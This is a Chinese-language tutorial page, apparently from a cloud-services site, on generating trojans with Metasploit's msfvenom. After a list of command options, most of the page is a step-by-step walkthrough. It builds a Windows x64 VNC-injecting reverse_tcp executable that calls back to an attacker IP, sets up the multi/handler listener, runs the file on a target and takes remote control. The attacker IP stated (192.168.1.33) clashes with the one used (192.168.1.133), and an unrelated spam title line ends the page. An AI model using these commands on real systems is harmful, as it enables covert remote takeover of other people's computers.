溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Metasploit中木馬生成的原理是什么

發布時間:2021-08-11 14:19:38 來源:億速云 閱讀:201 作者:Leah 欄目:大數據

Metasploit中木馬生成的原理是什么,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

一、生成方式:利用msf模塊中的msfvenom模塊

二、原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程序,并在目標機上執行,在本地監聽上線

三、msfvenom命令行選項如下

-p, --payload    <payload>       指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用&#039;-&#039;或者stdin指定    

-l, --list       [module_type]   列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all     

-n, --nopsled    <length>        為payload預先指定一個NOP滑動長度     

-f, --format     <format>        指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)     

-e, --encoder    [encoder]       指定需要使用的encoder(編碼器)     

-a, --arch       <architecture>  指定payload的目標架構         

--platform   <platform>      指定payload的目標平臺     

-s, --space      <length>        設定有效攻擊荷載的最大長度     

-b, --bad-chars  <list>          設定規避字符集,比如: &#039;\x00\xff&#039;     

-i, --iterations <count>         指定payload的編碼次數     

-c, --add-code   <path>          指定一個附加的win32 shellcode文件    

-x, --template   <path>          指定一個自定義的可執行文件作為模板     

-k, --keep                       保護模板程序的動作,注入的payload作為一個新的進程運行         

--payload-options            列舉payload的標準選項     

-o, --out   <path>               保存payload     

-v, --var-name <name>            指定一個自定義的變量,以確定輸出格式         

--shellest                   最小化生成payload     

-h, --help                       查看幫助選項         

--help-formats               查看msf支持的輸出格式列表

四、使用方法

1、msfvenom --list platforms   顯示支持的平臺

Metasploit中木馬生成的原理是什么

2、msfvenom --list formats   顯示支持的格式

Metasploit中木馬生成的原理是什么

Metasploit中木馬生成的原理是什么

3、msfvenom --list archs   顯示支持的架構

Metasploit中木馬生成的原理是什么

4、msfvenom --list encoders   顯示支持的編碼器

Metasploit中木馬生成的原理是什么

5、生成木馬

目標主機:192.168.1.129(win7 x64)

攻擊機:192.168.1.33 

攻擊端口:12121 

生成木馬:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

Metasploit中木馬生成的原理是什么

6、進入監聽模塊          use exploit/multi/handler 

7、設置payload反彈    set payload windows/x64/vncinject/reverse_tcp

Metasploit中木馬生成的原理是什么

8、查看需要設置的參數:show options

Metasploit中木馬生成的原理是什么

9、設置攻擊機ip:set lhost 192.168.1.133

10、設置攻擊端口:set lport 12121

Metasploit中木馬生成的原理是什么

11、將生成的exe文件上傳到目標主機并運行

12、run攻擊

Metasploit中木馬生成的原理是什么

13、攻擊機的監控畫面

Metasploit中木馬生成的原理是什么

14、目標主機畫面

Metasploit中木馬生成的原理是什么

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女